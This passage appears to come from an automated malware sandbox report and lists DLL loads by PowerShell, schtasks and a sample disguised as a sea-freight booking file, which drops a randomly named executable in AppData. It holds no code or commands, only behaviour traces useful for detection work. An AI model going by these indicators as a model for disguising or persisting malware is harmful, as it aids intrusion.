Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
